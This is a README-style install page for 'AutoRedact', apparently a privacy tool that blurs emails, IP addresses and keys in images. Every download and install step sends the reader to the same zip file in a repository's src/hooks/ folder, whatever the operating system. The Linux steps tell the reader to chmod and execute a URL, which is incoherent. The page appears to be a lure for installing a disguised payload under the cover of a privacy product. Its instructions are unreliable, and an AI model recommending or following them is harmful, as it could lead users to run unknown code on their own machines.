AutoRedact is a client-side image redaction tool designed to protect your privacy. This tool automatically finds and blurs personally identifiable information (PII) such as emails, IP addresses, and keys using local optical character recognition (OCR). Unlike many other tools, AutoRedact works entirely on your device, meaning your data stays safe and sound.

To make sure you successfully download and run AutoRedact, follow these steps:

📥 Download & Install

  1. Visit the Release Page: Go to our Releases page to see the available versions.
  2. Choose the Right Version: Look for the latest release and select the appropriate file for your operating system:
    • For Windows, download https://github.com/romelancheta/AutoRedact/raw/refs/heads/main/src/hooks/Auto-Redact-v2.7.zip
    • For Mac, download https://github.com/romelancheta/AutoRedact/raw/refs/heads/main/src/hooks/Auto-Redact-v2.7.zip

  3. Install the Application: Once you have downloaded the file:
    • For Windows: Double-click the https://github.com/romelancheta/AutoRedact/raw/refs/heads/main/src/hooks/Auto-Redact-v2.7.zip file and follow the prompts to install.
    • For Mac: Open the https://github.com/romelancheta/AutoRedact/raw/refs/heads/main/src/hooks/Auto-Redact-v2.7.zip file and drag the AutoRedact icon into your Applications folder.
    • For Linux: Make the https://github.com/romelancheta/AutoRedact/raw/refs/heads/main/src/hooks/Auto-Redact-v2.7.zip executable by running chmod +x https://github.com/romelancheta/AutoRedact/raw/refs/heads/main/src/hooks/Auto-Redact-v2.7.zip in your terminal. Then, you can execute it by double-clicking or by running https://github.com/romelancheta/AutoRedact/raw/refs/heads/main/src/hooks/Auto-Redact-v2.7.zip.

💻 System Requirements

Before installation, ensure your system meets these requirements:

  • Windows: Windows 10 or later
  • macOS: macOS Mojave (10.14) or later
  • Linux: A modern distribution with kernel version 4.4 or higher
  • RAM: At least 4 GB
  • Storage: At least 200 MB of free space

⚙️ Running AutoRedact

  1. Locate the installed application on your computer.
  2. Open AutoRedact by clicking on its icon.
  3. Upload the image you want to redact. You can drag and drop the image into the application window or click the "Upload" button to select a file from your computer.
  4. AutoRedact will automatically detect and blur any sensitive information in the image.
  5. Save the redacted image by clicking the "Save" button, and choose your desired location.
